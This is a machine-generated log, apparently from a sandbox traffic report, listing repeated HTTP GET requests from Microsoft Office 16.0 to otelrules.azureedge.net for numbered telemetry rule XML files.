          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
